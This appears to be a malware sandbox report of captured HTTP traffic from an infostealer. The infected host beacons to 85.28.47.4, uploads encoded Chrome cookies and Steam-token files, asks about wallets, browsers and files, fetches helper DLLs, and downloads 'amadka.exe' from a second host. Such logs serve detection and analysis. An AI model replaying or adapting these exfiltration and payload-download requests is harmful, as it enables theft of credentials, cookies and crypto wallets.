Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jun 2024 06:16:42 GMTContent-Type: application/octet-streamContent-Length: 2499584Last-Modified: Wed, 26 Jun 2024 04:18:01 GMTConnection: keep-aliveETag: "667b9679-262400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 0c db be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 be 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 30 9d 00 b7 0d 00 00 d8 3d 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 40 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 f0 21 00 00 00 9d 00 00 f0 21 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCGHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 30 31 42 33 34 46 38 43 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 2d 2d 0d 0a Data Ascii: ------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="hwid"2701B34F8C144293944220------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="build"default------JKEGIDGDGHCAAAAKKFCG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="message"browsers------KKJDGDHIDBGIECBGHJDB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAKJDGHIIJJKFHCFCAHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 2d 2d 0d 0a Data Ascii: ------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="message"plugins------AEBAKJDGHIIJJKFHCFCA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="message"fplugins------HDGCFHIDAKECFHIEBFCG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAECGHCBGCBFHIIDHIHost: 85.28.47.4Content-Length: 7195Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3L
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCAAKJDHJJJJJKKKFBHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 2d 2d 0d 0a Data Ascii: ------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="file"------HCGCAAKJDHJJJJJKKKFB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file"------IDHIIJJJKEGIDGCBAFIJ--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFHost: 85.28.47.4Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="message"wallets------AAEBAFBGIDHCBFHIECFC--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 2d 2d 0d 0a Data Ascii: ------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="message"files------BGDGHJEHJJDAAAKEBGCF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="file"------HDGCFHIDAKECFHIEBFCG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="message"jbdtaijovg------IDHIIJJJKEGIDGCBAFIJ--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
